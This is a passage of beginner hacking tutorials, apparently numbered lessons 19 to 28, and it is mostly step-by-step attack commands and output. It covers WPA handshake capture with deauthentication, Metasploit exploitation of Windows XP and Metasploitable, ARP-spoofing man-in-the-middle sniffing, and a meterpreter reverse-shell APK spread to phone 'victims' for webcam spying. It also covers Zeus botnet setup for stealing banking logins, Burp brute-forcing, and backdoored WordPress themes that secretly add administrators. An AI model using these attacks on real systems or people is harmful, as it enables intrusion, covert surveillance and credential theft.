bytes of EAPOL-Key Encryption Key (KEK) . 2. The handshake also yields the GTK (Group Temporal Key). 4. 3. The AP sends a nonce-value to the STA (ANonce). Now if your clients are very far from you. By the way. please get off this connection request) won't reach them. I have my cellphone creating a wireless network named 'me' protected with wpa-2. Airodump-ng (easy but not automatic. and in case of airodump- ng. Wifite (easy and automatic) 2. Your network card is good at receiving packets. 8 bytes of Michael MIC Authenticator Rx Key – Used to compute MIC on unicast data packets transmitted by the station The Michael MIC Authenticator Tx/Rx Keys provided in the handshake are only used if the network is using TKIP to encrypt the data. 4. if you didn't understand much of it then don't worry. I will (such a good guy I am :) ). but wifite does all this crap for you. There's a reason why people don't search for hacking tutorials on Wikipedia (half the stuff goes above the head) Capturing The Handshake Now there are several (only 2 listed here) ways of capturing the handshake. you could either sit there and wait till a new client shows up and connects to the WPA network. Now the methodology is same for wifite and airodump-ng method. Get the handshake with wifite Now my configuration here is quite simple. Okay enough theory. and you'll keep wondering why you aren't getting any handshake (the same kind of problem is faced during ARP injection and other kind of attacks too). Now you need to realize that for a handshake to be captured. and when they connect back. but not as good in creating them. you'll have to call a brethren (airreply-ng) to your rescue.e. there needs to be a handshake. So. the idea is to be as close to the access point (router) and the clients as possible. Now currently no one is connected to the . Now while other tutorials don't mention this. you manually have to do what wifite did on its own) Wifite Methodology We'll go with the easy one first. We'll look at them one by one- 1. 8 bytes of Michael MIC Authenticator Tx Key – Used to compute MIC on unicast data packets transmitted by the AP 5. you capture their handshake. your deauth requests (i. or you can force the already connected clients to disconnect. Now there are 2 options. :' / \ [+] scanning for wireless devices. . This is an added bonus.. /___\ . me..----. /_____\ .' . root@kali:~# wifite .. `. CTRL+C when ready. But I pressed ctrl+c and it tried to capture the handshake.. ':.e.. Lets try and see what wifite can do. It has almost 100% success rate. and would have given us the password had I waited for 2-3 hours. or 'all': Now I selected the first target..' `.-. done [+] initializing scan (mon0).. :: :: : ( ) : :: :: automated wireless auditor ':. First it tried the PIN guessing attack.------ 1 me 1 WPA2 57db wps 2 ******* 11 WEP 21db no client 3 ************** 11 WEP 21db no Now as you can see. As expected.:' designed for Linux ':.:' ':.:' . [+] enabling monitor mode on wlan0. 0 targets and 0 clients found [+] scanning (mon0).. updates at 5 sec intervals.' . Also. and then pressd ctrl+c. I waited for 10-20 secs.. wifite will use reaver too to skip the whole WPA cracking process and use a WPS flaw instead.:' . i.---.:' .. Here's what happened. WiFite v2 (r85) .. it had two attacks in store for us. `..' `..' . NUM ESSID CH ENCR POWER WPS? CLIENT --. .. CTRL+C when ready. No client was there so no handshake could be captured.-------------------.. updates at 5 sec intervals.' `. reaver can save you from all the trouble..network. I pressed ctrl+c and wifite asked me which target to attack (the network has wps enabled.---. my network showed up as 'me'. `.. ':. in this tutorial we'll forget that this network has WPS and capture the handshake instead) [+] select target numbers (1-3) separated by commas. ':. /_\ . [0:00:04] scanning wireless networks. Lets do it again.. (^C) WPA handshake capture interrupted [+] 2 attacks completed: [+] 0/2 WPA attacks succeeded [+] quitting Now the deauth attacks weren't working.[+] 1 target selected. Lets see what happens this time around..---.---.------ 1 * 1 WPA 99db no client 2 me 1 WPA2 47db wps client 3 * 11 WEP 22db no clients 4 * 11 WEP 20db no [+] select target numbers (1-4) separated by commas. This time I increased the deauth frequency. (^C) WPS brute-force attack interrupted [0:08:20] starting wpa handshake capture on "me" [0:07:51] listening for handshake. and wifite will de-authenticate it.. 0/0 success/ttl. done [+] quitting Now I connected my other PC to 'me'.. 0/0 success/ttl. (^C) WPS brute-force attack interrupted [0:08:20] starting wpa handshake capture on "me" [0:08:05] listening for handshake. This time a client will show up.-. root@kali:~# wifite -wpadt 1 . [0:00:00] initializing WPS PIN attack on me (02:73:8D:37:A7:ED) ^C0:00:07] WPS attack.-------------------. or 'all': 2 [+] 1 target selected.. NUM ESSID CH ENCR POWER WPS? CLIENT --. [0:00:00] initializing WPS PIN attack on me (02:73:8D:37:A7:ED) ^C0:00:24] WPS attack. and it'll try to connect again. (^C) WPA handshake capture interrupted [+] 2 attacks completed: [+] 0/2 WPA attacks succeeded [+] disabling monitor mode on mon0..----. :' .' .' `. however.' . /_____\ .-. WiFite v2 (r85) . [+] 1 target selected.. finally.-------------------..:' / \ [+] scanning for wireless devices.. 0/0 success/ttl.----. This will solve the problems for us. /_\ . ':. wlan0 Atheros ath9k . Now look at wifite output NUM ESSID CH ENCR POWER WPS? CLIENT --. So time to bring my external card to the scene. This time....' .------ 1 me 1 WPA2 44db wps client 2 * 11 WEP 16db no client 3 * 11 WEP 16db no [+] select target numbers (1-3) separated by commas. . ':.' `.Soon. :: :: : ( ) : :: :: automated wireless auditor ':. (^C) WPS brute-force attack interrupted [0:08:20] starting wpa handshake capture on "me" [0:07:23] listening for handshake.[phy1] 2. `.:' designed for Linux ':. .. `..' `.---.[phy0] [+] select number of device to put into monitor mode (1-2): See.. I captured a handshake. ':..:' ':. that the problem was that I was using my internal card (Kali Live USB). root@kali:~# wifite . I realized.. [+] available wireless devices: 1.:' ..---.. so deauth wasn't working. wlan1 Ralink RT2870/3070 rt2800usb . [0:00:00] initializing WPS PIN attack on me (02:73:8D:37:A7:ED) ^C0:00:01] WPS attack. `.. It does not support packet injection... or 'all': Now I attack the target.:' . /___\ . we can use the USB card now. This time I won't show you the problems you might run into. one every 10 secs is defualt).ethernet  wlan ... Now.hccap). then you are missing a lot of things. Capturing Handshake with Airodump-ng Now if you skipped everything and got right here. I'll end this pretty quick. Let's see how to do the same thing with airodump-ng. . Now the captured handshake was saved as a . pyrit. all the problems were seen in wifite case. [0:00:57] handshake captured! saved as "hs/me_02-73-8D-**-**-**. Alright. (If you are not a newbie. See the result.kalitutorials. etc. I'm copying stuff from http://www. now. you need to know its name. hashcat (after converting . as the wifite thing was quite detailed.loopback.  eth . It'll be a perfect ride. done [+] quitting As you can see. so to scan one. Find out the name of your wireless adapter. to see all the adapters. skip to the point where you see red text) 1. We'll use Wifite only to capture the handshake. it took me 57 seconds to capture the handshake (5 deauth requests were sent. Note the suffix associated.net/2013/08/wifi-hacking-wep.This is what we want. using either a wordlist or bruteforce. your computer has many network adapters. So there are basically the following things that you need to know-  lo . Note down the wlan(0/1/2) adapter.html where I already discussed airodump-ng.cap" [+] 2 attacks completed: [+] 1/2 WPA attacks succeeded me (02:73:8D:37:A7:ED) handshake captured saved as hs/me_02-73-8D-**-**-**. The no dictionary error shouldn't bother you.cap [+] starting WPA cracker on 1 handshake [!] no WPA dictionary found! use -dict <file> command-line argument [+] disabling monitor mode on mon0. Not important currently. type ifconfig on a terminal.cap file which can be cracked using aircrack. we use a tool called airmon-ng to create a virtual interface called mon.Trouble with the wlan interface not showing up. Enable Monitor mode Now. You should try booting Kali using Live USB (just look at the first part of this tutorial). 2. or buy an external card. . This is because virtual machines can't use internal wireless cards and you will have to use external cards. Just type airmon-ng start wlan0 Your mon0 interface will be created. This tool gathers data from the wireless packets in the air. Start capturing packets Now. You'll see the name of the wifi you want to hack.3. airodump-ng mon0 . we'll use airodump-ng to capture the packets in the air. Store the captured packets in a file This can be achieved by giving some more parameters with the airodump command airodump-ng mon0 --write name_of_file .4. -a will required BSSID and replace BSSID here with your target BSSID. then fix mon0 on a channel using- root@kali:~# airodump-ng mon0 -w anynamehere -c 1 Replace 1 with the channel where your target AP is. mon0 is the interface you created. or problem with beacon frame. In case you face problems with the monitor mode hopping from one channel to another. (It's a bug with aircrack-ng suite). 0 tell it to fire it at interval of 0 secs (very fast so run it only for a few secs and press ctrl+c). you'll see that at the top right it says WPA handshake captured . You might also need to add -- ignore-negative-one if aireplay demands it. Here is what it looks like . In my case airodump-ng says fixed channel mon0: -1 so this was required.Non newbies- root@kali:~# airmon-ng start wlan1 root@kali:~# airodump-ng mon0 -w anynamehere Now copy the bssid field of your target network (from airodump-ng ng screen)and launch a deauth attack with aireplay-ng root@kali:~# aireplay-ng --deauth 0 -a BSSID here mon0 The --deauth tells aireplay to launch a deauth attack. Now when you look at the airodump-ng screen. cap Read 212 packets.CH 1 ][ Elapsed: 24 s ][ 2014-06-13 22:41 ][ WPA handshake: ** BSSID PWR RXQ Beacons #Data.1 742 82 me * * -35 0e. Its been a long one.cap Opening anynamehere-01.1 0 26 You can confirm it by typing the following root@kali:~# aircrack-ng anynamehere-01. # BSSID ESSID Encryption 1 ************** me WPA (1 handshake) 2 ** Unknown Happy cracking. Hope it helped you. all that needs to be done in this tutorial has been done. . #/s CH MB ENC CIPHER AUTH ESSID 02:73:8D:37:A7:ED -47 75 201 35 0 1 54e WPA2 CCMP PSK me BSSID STATION PWR Rate Lost Frames Probe * * 0 0e. but we can definitely hack an unpatched Windows XP machine. Virtual Machines   Windows XP . I'm gonna teach you penetration testing the way I learnt it. Testing this method on someone else's computer is not recommended and is quite illegal. However. It is strongly advised to create your own virtual machine and test exploits there. installing XP on a VM will be a piece of cake.Hacking XP Our approach to penetration testing is going to be simple. By doing actual penetration and exploitation. We can't hack completely patched Windows 7 or Windows 8 right. I already made a post about the ideal way to begin penetration testing. you need to victim machine. to do that. But we aren't going to ideal way. a few screenshots of the process) . Lesson 20: Hacking Windows XP Penetration Testing . A look at Metasploit Framework Starting the framework "In keeping with the Kali Linux Network Services Policy. there are no network services. including database services. running on boot so there are a couple of steps that need to be taken in order to get Metasploit up and running with database support." . there is a Windows XP Sp3 virtual machine running side my side with . The first time the service is launched.Simply speaking. service metasploit start Now finally we are ready to start metasploit framework. Also. it will create a msf3 database user and a database called msf3. The service will also launch the Metasploit RPC and Web servers it requires. my metasploit framework is running on Kali on Vmware on a Windows 8 machine. we next need to launch the metasploit service. there are some services that metasploit needs which aren't started with system startup. So here's some commands you need to execute on your console before you can start metasploit service postgresql start (Metasploit uses PostgreSQL as its database so it needs to be launched first. msfconsole Looking at the targets Right now.) With PostgreSQL up and running. Port Scan Metasploit offers an awesome port scanning function which goes by the name auxiliary scanner. In my case the IP is 192. firstly. enter the following code- use auxiliary/scanner/portscan/tcp Type show options to see the available options show options Now we have to change a few settings. Open command prompt and type ipconfig In the results. Here is the command to execute this scan To use this feature. check the IP of the machine. Go to your XP virtual machine (the one you are trying to hack).131 Now go back to your Kali machine. as the IP is not going to be the same in all cases. we have to specify a target IP to scan.63. and type the fol (change the IP as required) .168.my Kali. For this we'll do a port scan. we should reduce the number of ports scanned set ports 1-500 Secondly. This is what you'll have to specify the RHOSTS option as. Now this is a bit tricky. So what we need to do is detect these machines in Metasploit framework. So here's what you'll do. If you had not been using an unpatched version of Windows. do a show options again to see what all changes you've made. Nothing much you can do.set RHOST 192. This basically means that there are no open ports here. I turned off the firewall on the windows machine and run the auxiliary module again. I spelled RHOSTS wrong. Now we are ready for some action. .131 Here's what it should look like There's a slight error here. In my case. Finally. and had a vulnerable machine. type- run The scan will start and after some time it will show you which tcp ports are open and vulnerable to attack. Make sure you add the 's' in the end.168. However if you had some good luck there.63. there will not be any vulnerable ports. you will have some vulnerable ports. 168. We need to figure out which exploits work on the OS we are attacking. Finding Exploits This step is important.168. open ports and OS of the target computer. we can use Nmap port scanner which is much better than auxiliary. Type back to get out of auxiliary scanner.I got 3 open ports this time. type use exploit/windows/dcerpc/ms03_026_dcom You are now using the most famous Windows exploit. Type show options again show options Again. (Which shows great as rank). you too might need to disable firewall in order to get open ports. you don't know about the IP. In such cases. If you are using some higher XP version.131 (replace with the IP of your target) set RHOST 192.131 . Now we know we have a target at IP 192.63. In our case.63. Search for dcom on msfconsole. set the RHOST as 192. In the next line. search dcom This is a very famous exploit for Windows. Copy the exploit number 3.131 and it has port 135 139 and 445 open. Real life port scan In actual pentesting environment.63.168. We'll come to that later. we already know what to do. Try out what all you can do from here on.Also. . I'll come up with more in the next tutorial. In short. You have an open shell on the target computer with administrator privileges. you own that computer now. We have a pentesting lab now and have successfully exploited an XP machine. set PAYLOAD windows/shell_bind_tcp And here's the best part exploit You have now successfully broken into the target computer. set a payload. [Quoted from Rapid7] Download and install metasploitable linux Firstly. no installation is needed. and the image should never be exposed to a hostile network.net/projects/metasploitable/ The last time I checked. I'd list some requirements. 1gb for kali.Lesson 21: Metasploitable 2 Metasploitable 2 Linux . If you have all this.10 to 30 GB disk space for metasploitable (Kali would need a similar amount of disk space). 1gb for metasploit. then go ahead and download Metasploitable from sourceforge. By default.http://sourceforge. VirtualBox. 1GB ram for metasploitable (a total of 4GB would be great. What IS needed is a virtual machine . which you probably should. Metasploitable's network interfaces are bound to the NAT and Host-only network adapters.Most Vulnerable OS in the town : Introduction and Installation What is Metasploitable 2 The Metasploitable virtual machine is an intentionally vulnerable version of Ubuntu Linux designed for testing security tools and demonstrating common vulnerabilities. Version 2 of this virtual machine is available for download and ships with even more vulnerabilities than the original image. . and 2gb will keep your host OS running). After extracting it. and other common virtualization platforms. the download was a zip file. This virtual machine is compatible with VMWare. follow these instruction- Open Vmware workstation. Detailed guides are available for all of these on the internet. Open that one. and will give the instructions for it. Vmware player is free.software like Vmware or virtualbox. and I won't waste much time with it. Something like this will pop out. or VmWare workstation. Click on open. which you'll have to buy. Click on file -> Open. which is free. Assuming you have downloaded and extracted the Metasploitable file. You can use Virtual Box. It must look somewhat like this. and installed Vmware Workstation. I am using Vmware Workstation. . You will see something with Vmware icon. and will serve most of your purposes. After that browse to the location where you extracted the Metasploitable file. . . providing you with 100s of tools pre-installed. Once you've started Metasploitable You'll have a login prompt. and the login username and password would be given right there. Now your target is ready. Nothing else needs to be done here. It comes preinstalled with Metasploit. then you also know how to use Metasploit to hack Windows machine. So if you have to OS. so it takes down one step. but the instructions provided by the program would be simple and clear and you can help yourself. Depending on the situation. a few more next and enter stuff would be required. it has been written from scratch in Debian and has resolved most of the backtrack issues. It simplifies everything for you. If you have been following this blog for a long time. follow along. It has some advantages over Backtrack. and the basic hacking skills. and are ready to jump to the next post. Backbox Linux and other Linux distributions will work well too. If this is not your visit to this blog.Your Virtual machine will be up and running within a few minutes. there is no reason why NOT to use Kali Linux. and is specifically designed for pentesting. If not. . then you can stop here and move to the next post (coming soon). but you are far from done. It would be msfadmin. Kali Linux and metasploit While its not necessary to use Kali Linux. then you have probably already installed Kali Linux and know how to use it. and Backtrack. if you can't seem to find it. most importantly. 8. MIM. You can change your terminal interface to make the view much more friendly and easy to monitor by splitting kali linux terminal window.8 . with IP address : 192. Urlsnarf Step by step Kali Linux Man in the Middle Attack : 1. Victim IP address : 192. 2. because act as man in the middle attacker. The next step is setting up arpspoof between victim and router.93 Router IP address : 192. making them believe that they are talking directly to each other over a private connection. The man-in-the-middle attack (often abbreviated MITM. Open your terminal (CTRL + ALT + T kali shortcut) and configure our Kali Linux machine to allow packet forwarding. here is some definition from wikipedia. MiM. MITMA) in cryptography and computer security is a form of active eavesdropping in which the attacker makes independent connections with the victims and relays messages between them. Arpspoof 2. MitM. 3.168. We will learn the step by step process how to do this.8 Requirements: 1. Kali Linux must act as router between "real router" and the victim.8.Lesson 22: Man In The Middle Attack Today our tutorial will talk about Kali Linux Man in the Middle Attack.168.8. Read the tutorial here how to set up packet forwarding in linux.168.90 Attacker network interface : eth0.8. I believe most of you already know and learn about the concept what is man in the middle attack. but if you still don't know about this. How to perform man in the middle attack using Kali Linux.90 192.8. when in fact the entire conversation is controlled by the attacker.168. Driftnet 3. arpspoof -i eth0 -t 192.168. According to its website. driftnet will capture all image traffic. For the next step we will try to capture the website information/data by using urlsnarf. . After step three and four. Driftnet is a program which listens to network traffic and picks out images from TCP streams it observes.8. arpspoof -i eth0 192.4. now all the packet sent or received by victim should be going through attacker machine. 7.168. To stop driftnet.8. 9. And then setting up arpspoof from to capture all packet from router to victim.168. To run driftnet. just close the driftnet window or press CTRL + C in the terminal 8. To use urlsnarf. Now we can try to use driftnet to monitor all victim image traffic. Fun to run on a host which sees lots of web traffic. we just run this driftnet -i eth0 When the victim browses a website with image. attacker will know the address victim visited. 6. just run this code urlsnarf -i eth0 and urlsnarf will start capturing all website address visited by victim machine. When the victim browses a website.90 5.8 192. you can use Nmap scan. Here is what it should look like.131. In my case.154. open a terminal. Type ifconfig.xxx range. then you should be sitting here with Kali Linux and Metasploitable 2 up and running. Metasploitable 2 : Vulnerability assessment and Remote Login If you've followed my previous tutorial on Introduction to Metasploitable 2.168. Portscan On a Kali Linux machine.168. This will give you an idea of what the ip of your target machine could be.154. This means that Metasploitable must have an IP residing somewhere in the 192. To scan all ports in that range.Lesson 23: Metasploitable 2 – Vulnerability Assessment. So. ifconfig returned my IPv4 address as 192.0/24 . nmap -sS 192.168. and note the eth0 IP address.154. I'm gonna skip the formalities and move right ahead. after logging in with msfadmin:msfadmin.132 (or whatever may be your case). you can execute an ifconfig to verify that the IP is indeed 192. each of these ports is a potential gateway into the machine.154. Web Application Vulnerabilities .168. Also.168. Vulnerable Web Services. Weak Passwords . There is a very resourceful article about many vulnerabilities on Rapid7 website.Some vulnerable web applications can be exploited to gain entry to the system. These backdoors can be used to gain access to the OS. As you will discover later. Misconfigured Services . Backdoors . 2.154.A few web services pre-installed into Metasploitable have known vulnerabilities which can be exploited.132. On the metasploitable machine.A lot of services have been misconfigured and provide direct entry into the operating system. Exploiting The Vulnerabilities . 3.These are vulnerable to bruteforce attacks.The conclusion that can be drawn here is that the Metasploitable 2 machine has IP 192. 5. Vulnerabilities Now the Metasploitable 2 operating system has been loaded with a large number of vulnerabilites. 4.A few programs and services have been backdoored. it has a huge lot of open ports. There are the following kinds of vulnerabilities in Metasploitable 2- 1. 168.154. root@kali:~# rlogin usage: ssh [-1246AaCfgKkMNnqsTtVvXxYy] [-b bind_address] [-c cipher_spec] [-D [bind_address:]port] [-e escape_char] [-F configfile] [-I pkcs11] [-i identity_file] [-L [bind_address:]port:host:hostport] [-l login_name] [-m mac_spec] [-O ctl_cmd] [-o option] [-p port] [-R [bind_address:]port:host:hostport] [-S ctl_path] [-W host:port] [-w local_tun[:remote_tun]] [user@]hostname [command] rlogin -l root 192. We will use rlogin to remotely login to Metasploitable 2. They have been misconfigured in such a way that anyone can set up a remote connection without proper authentication. RSA key fingerprint is *****.154.132 Most probably you will get something like this- root@kali:~# rlogin -l root 192.168. This vulnerability is easy to exploit.168.154.132)' can't be established.Rlogin Remember the list of open ports which you came up across during the port scan? The 512.168.Remote access vulnerability .132 (192.513 and 514 ports are there for remotely accessing Unix machines. Type rlogin to see the details about the command structure.154.132 The authenticity of host '192. . 6. The rsh- client is a remote login utility that it will allow users to connect to remote machines.168. you should try your previous command again. . This time around.168.154. [email protected]' (RSA) to the list of known hosts.0 on pts/0 Linux metasploitable 2. It's because we don't have ssh-client installed on Kali Linux.132 Last login: Thu May 1 11:34:55 EDT 2014 from :0. apt-get install rsh-client This will start the installation progress. things will be better. After the installation is successful.Are you sure you want to continue connecting (yes/no)? yes Warning: Permanently added '192.132's password: As you can see. root@kali:~# rlogin -l root 192. you'll have to type yes once or twice.154.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686 The programs included with the Ubuntu system are free software. the exact distribution terms for each program are described in the individual files in /usr/share/doc/*/copyright.154. It's not because the target is not vulnerable. it is asking for a password. Kali will do the rest for you. Telnet Vulnerability Look at the open port list again. root@metasploitable:~# Now you have an administrator privilege shell on Metasploitable 2. a popular FTP server. That was as easy as typing one line. The version that is installed on Metasploit contains a backdoor.131 1524 This is a another one line exploit.168. to the extent permitted by applicable law. If a username is sent that ends in the sequence ":)" (the happy smiley). The backdoor was quickly identified and removed. To access official Ubuntu documentation.Ubuntu comes with ABSOLUTELY NO WARRANTY. but not before quite a few people downloaded it. This means anyone can login to a computer without knowing the credentials. .ubuntu. Till then something for your appetite- telnet 192. on the 1524 ingreslock port (see portscan result). This can be exploited using Metasploit. please visit: http://help. the backdoored version will open a listening shell on port 6200. (and installing an application).com/ You have mail. We have one more such vulnerability that can be exploited easily. We will cover this in the next tutorial. On port 21.99. Metasploitable 2 runs VSFTPD. just use :). Android smartphone (we use HTC One android 4. very similar to an MSI package in Windows or a Deb package in Debian-based operating systems like Ubuntu. Metasploit framework (we use Kali Linux 1.8. Here is some initial information for this tutorial: Attacker IP address: 192.. Initially developed by Android. software. Android is an operating system based on the Linux kernel. .168. Inc.94 Attacker port to receive connection: 443 Requirements: 1.What is android? according to wikipedia: and what is APK? according to wikipedia: Android application package file (APK) is the file format used to distribute and install application software and middleware onto Google's Android operating system. which Google backed financially and later bought in 2005.6 in this tutorial) 2. msfpayload android/meterpreter/reverse_tcp LHOST=<attacker_ip_address> LPORT=<port_to_receive_connection> As described above that attacker IP address is 192.168.94 now execute the command. Our tutorial for today is how to Hack Android Smartphones using Metasploit.4 KitKat) Step by Step Hacking Android Smartphone Tutorial using Metasploit: 1.8. Open terminal 2.0. Android was unveiled in 2007 along with the founding of the Open Handset Alliance: a consortium of hardware. the security threat is also increasing together with the growth of its users. We will utilize Metasploit payload framework to create exploit for this tutorial.Lesson 24: Hacking Android Nowadays mobile users are increasing day by day. and telecommunication companies devoted to advancing open standards for mobile devices. and designed primarily for touchscreen mobile devices such as smartphones and tablet computers. Info: use exploit/multi/handler –> we will use Metasploit handler set payload android/meterpreter/reverse_tcp –> make sure the payload is the same with step 2 4.94 –> attacker IP address set lport 443 –> port to listen the reverse connection exploit –> start to listen incoming connection 5. Info: set lhost 192. for example webcam_list gives you a list of the camera's on the victims device such as: back camera front camera .3.8. attacker needs to set up the handler to handle incoming connections to the port already specified above. The next step we need to configure the switch for the Metasploit payload we already specified in step 3. Type msfconsole to go to Metasploit console. After victim open the application. the meterpreter session will open and the attack has begun.168. Short stories the victim (me myself) download the malicious APK's file and install it. internet is the good place for distribution ). Attacker already have the APK's file and now he will start distribute it (I don't need to describe how to distribute this file. 7. this means that attacker already inside the victim android smartphone and he can do everything with victim phone. Because our payload is reverse_tcp where attacker expect the victim to connect back to attacker machine. 6. Experiment with different commands at this point. make sure you can view.webcam_snap 2 Would take a picture from one of the cameras sneaky sneaky. If you really want to install APK's from unknown source. . Conclusion: 1. 2. read and examine the source code. Don't install APK's from the unknown source. Cisco. the source code and compiled binaries are found to be hosted on GitHub. I named it bot. As of 13 May 2011. Open the internet browser and type http://localhost/phpmyadmin. Firstly. Input the username and password. NASA. After that create a new database. those same experts warned the retirement was a ruse and expect the cracker to return with new tricks. it became more widespread in March 2009. In late 2010. Oracle. Requirements: 1. Monster. the creator of the SpyEye trojan. Since we're using XAMPP for this tutorial. We choose Zeus because Zeus was one of the famous trojan horse viruses in history that infected many servers around 2007-2010. In June 2009.Lesson 25: Remote Administration Tool (RAT) Today we will learn how to set up Remote Administration Tool Zeus BotNet (RAT). but you can change it into whatever you want. security company Prevx discovered that Zeus had compromised over 74. Zeus is spread mainly through drive-by downloads and phishing schemes.000 FTP accounts on websites of such companies as the Bank of America. Web Server + Database Server (in this example we use XAMPP) Remote Administration Tool(RAT) Zeus BotNet: 1. a number of Internet security vendors including McAfee and Internet Identity claimed that the creator of Zeus had said that he was retiring and had given the source code and rights to sell Zeus to his biggest competitor. . 2. First identified in July 2007 when it was used to steal information from the United States Department of Transportation. and BusinessWeek. ABC. If you don't know about Zeus. you can refer to previous step by step How to Install XAMPP in 7 Simple Steps to install XAMPP on Windows machine and make sure your XAMPP apache and MySQL service was started and running. by default the username is root and password leave it empty. Play. we need to install the web server and database server. Remote Administration Tool (RAT) Zeus BotNet 2. Amazon. This database name will be used for the installation of remote administration tool.com. However.com. here is the definition from Wikipedia: Zeus is a Trojan horse that steals banking information by Man-in-the-browser keystroke logging and Form Grabbing. 3. – Encryption key you can fill with any characters with length from 1 – 255 click Install to start installing.txt. The next step we need to download the remote administration tool file and extract it. b. – Database is filled with information about our database name that already created in step 2. The next step is configuring and create the zeus bot client.txt configuration file. In the edit user page. Open your PHPMyAdmin http://localhost/phpmyadmin and click the Privileges tab. url_loader and url_server configuration according to your settings for your IP address. I give the folder name as bot. Note: don't forget to edit the path of webinjects. Create a new folder inside C:\xampp\htdocs. If you run XAMPP it should be your IP address. Open the builder folder and open config. Notes: If you get this error ERROR:Failed connect to MySQL server: Host 'myusername' is not allowed to connect to this MySQL server You need to do the following step by step a. you will find 3 main folders. Input all required field with the correct information. Now back again into our web browser and type http://localhost/bot/install into the address bar. Change the Host from localhost to Any host and press Go button. and server[php]. 6. . then copy the server [php] contents into C:\xampp\htdocs\bot. Change the url_config. Click edit button to edit the root user privileges. 4. scroll down and find the login information section. builder. Information: – The host address for MySQL filled with your database server IP address. other. 7. We can see the new infected victim in the web interface and even view the desktop screenshot of the victim. always update your operating system and anti virus and do not click any link that looks suspicious in your mail or chat messenger. 2. When victim already infected.exe file. Click builder.exe to the victim. Click build the bot configuration under the actions header. .bin and bot. To prevent the attack of this trojan.php and insert your username and password.exe. then click browse. After victim execute the file we can check our attacker server. . Now for the next step. 8. 9. then build the bot executable. Mine was inside C:\xampp\htdocs\bot. Copy those two file into the htdocs folder. Now let's says we will send the generated bot. attacker can gather many information from the victim including all internet activities and even gather all the website username and password since this tool can act as a keylogger and capturing the log in information. Open the browser and type http://localhost/bot/cp. now we have the new file config. After all the build bot config and bot executable on step 7. Conclusion: 1. 10. open the zsb. In order to receive authorization the client should send requested identification information using Authorization header. Hacking HTTP Basic Authentication Dictionary Attacks with Burp Suite Free: .net (in this tutorial I use the free edition) and install it. The clients need to provide the credentials in a Base64 encoded string username:password. Compose a basic PHP login script to use on the victim machine.Lesson 26: Hacking Basic HTTP Authentication using Burp Suite Hacking http basic authentication dictionary attacks with burp suite free is our tutorial for today. here is the explanation from their website: Burp Suite is an integrated platform for performing security testing of web applications. Burp gives you full control. more effective. from initial mapping and analysis of an application's attack surface. Upon a request for resource within a protected space the server should respond with authentication challenge using WWW-Authenticate header. to make your work faster. Requirements: 1. through to finding and exploiting security vulnerabilities. HTTP supports several authentication mechanisms. Its various tools work seamlessly together to support the entire testing process. The simplest and most common HTTP authentication in use is Basic. If you just hear about BURP suite. 2. Download BURP suite at portswigger. and more fun. letting you combine advanced manual techniques with state-of-the-art automation. we will use a tool called BURP suite. Explanation about HTTP basic authentication. When the client is not authorised a 401 “Unauthorised” response status is returned. If the credentials are correct the web server returns the requested resource otherwise the server repeats the authentication challenge. BURP will intercept the data. but in above example I input the passwrd one by one. we're still on PAYLOADS TAB. 6. The PHP script on requirement number 2 is a simple log in page. After finished setting up the attack type. Now we will change the payload set number two. Run your BURP suite and change your browser proxy setting to run through BURP application. now we can access the login. for testing purpose. Right click and choose "Send to Intruder". I input the username one by one. . 5.1. In this example. On INTRUDER –> POSITIONS tab. 4. By default BURP will use port 8080. if you don't know how to change the browser proxy settings. . I will input username = test and password = test. change the attack type to "Cluster Bomb". we can move to PAYLOADS tab. When proxy already set up. a simple google search can tell you how. 8. The last PAYLOADS to set up is the submit parameter. On payload number three we will input the password. see the picture on step 4 Payload set 1 = PHPSESSID (the value) we will set up the same PHP SESSID value. 2. You can copy it to your HTDOCS folder if you use XAMPP or WAMP for your web development platform. 3. because the system uses a static PHPSESSID. Payload set 2 = username (the value) you can load the username data from username list. 7. To fill this PAYLOADS. When we click the submit button(LOG IN). Payload set 3 = password (the value) on this step you also can load from a password list.php file. the system will force the user to solve the captcha. From this example we know that the username = admin and password = 123456 Conclusion: 1. .Payload set 4 = submit (the value) since this submit is to check whether user click the button or not. 2. but in my opinion the first conclusion was better. When there's matching username and password. To prevent this kind of attack. Click Intruder and choose "Start Attack". If you try to log in and failed for several times. 10. Every PAYLOADS has been set up successfully. as a user you can do nothing. As a developer you can do add the salt into username and password to make attack time much longer since you've added the salt. now we will start the attack and watch BURP suite perform the attack automatically. 9. BURP suite itruder will check the username and password one by one. we can make it the same value LOG+IN%21. you can view the length was changed. as developer you can do like GMail anti brute force system where every trying is logged by the system based on their IP address. . We want to know about the wordpress user information of a user. execute this script on your local wordpress server. Know wordpress function. 3. 2.Lesson 27: Hacking Wordpress – Send Secret emails from malicious layout codes about site info. Even we know the username and password hash. Let see the following script: 2. Step by step Hacking WordPress: Send Email Secretly About Website Information: 1. Understand PHP. Requirements: 1. but we still need time to crack the password hash to get the plain password from the user. . oday title is Hacking WordPress: Send Email Secretly About Website Information.com User first name: User last name: User display name: victim User ID: 1 3. here is what I got: Username: victim Password: $P$BtwjqOL0j8USlI4htLLp0wnmizvaEB User email: victim@victim. The script on step one if executed will show the details of active wordpress user (logged in). Script to send email secretly (ask for script when ready). From the problem in step three. . we will use the method to combine this tutorial WordPress hacking tutorials to add administrator user secretly and send the URL address of the infected website by inserting the following script. base64_encode (most attackers use base64 encoding) http:// (check the URL that going somewhere). but the problem is: "how do we know who already download the malicious wordpress themes?" 4. Download the wordpress themes only from the trusted source. it's way too plain how if we encode it using base64_encode PHP function. and here is the result. Conclusion: 1. we can add administrator secretly by spreading the malicious themes. When saw this email address. make sure you check the source code one by one the themes to minimize the attack. Buying usually better than "free download" 3. The script I provide you will send email secretly to the attacker containing the wordpress URL when victim logs in and browses his/her wordpress website. Usually this kind of attack you can find on a premium wordpress themes (nulled edition or warez). 2. 5.On our last hacking tutorial about WordPress hacking tutorials to add administrator user secretly. you can give a try to find the strings below in your themes code (especially the nulled and warez edition) to check whether it has a malicious code or not. 6. Lesson 28: Reveal Asterisk Saved Passwords We will learn how to reveal the asterisk on Mozilla Firefox and Google Chrome without seeing the saved password from the browser options menu. If you still never heared about Firebug, here is the description from wikipedia: Firebug is a web development tool that facilitates the debugging, editing, and monitoring of any website's CSS, HTML, DOM, XHR, and JavaScript; it also provides other web development tools.[2] Firebug's JavaScript panel can log errors, profile function calls, and enable the developer to run arbitrary JavaScript. Its net panel can monitor URLs that the browser requests, such as external CSS, JavaScript, and image files. The net panel can display both request headers and response headers for each page asset; it can also estimate the time each asset took to load. Requirements: 1. Mozilla firefox with firebug addons. 2. Google chrome. Step by step to Reveal Asterisk Saved Passwords on Mozilla Firefox and Chrome: 1. Open our Mozilla Firefox 